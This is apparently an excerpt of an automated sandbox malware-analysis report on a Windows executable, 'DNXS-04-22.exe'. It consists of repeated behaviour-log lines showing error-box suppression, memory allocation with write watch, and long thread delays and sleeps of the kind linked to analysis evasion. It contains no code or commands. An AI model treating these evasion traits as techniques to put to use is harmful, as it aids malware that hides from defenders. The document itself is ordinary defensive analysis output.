                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 2C70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 8240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 9240000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 9410000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: A410000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: 4A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239875Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239748Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239640Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239517Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239406Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239297Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239172Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239062Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598662Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598327Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597545Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596540Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596217Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596022Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 595913Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 595811Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594585Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594474Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594226Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594016Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593793Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593687Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593571Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593469Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593358Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeWindow / User API: threadDelayed 840Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeWindow / User API: threadDelayed 645Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeWindow / User API: threadDelayed 2849Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeWindow / User API: threadDelayed 6995Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239748s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239517s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 1448Thread sleep time: -239062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep count: 37 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7472Thread sleep count: 2849 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7472Thread sleep count: 6995 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599344s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598662s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597545s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -597000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596891s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596540s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596217s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -596022s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -595913s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -595811s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -594585s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -594474s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -594359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -594226s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -594125s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -594016s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -593906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -593793s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -593687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -593571s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -593469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exe TID: 7468Thread sleep time: -593358s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239875Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239748Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239640Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239517Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239406Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239297Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239172Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 239062Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598662Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598327Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598218Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598109Jump to behavior
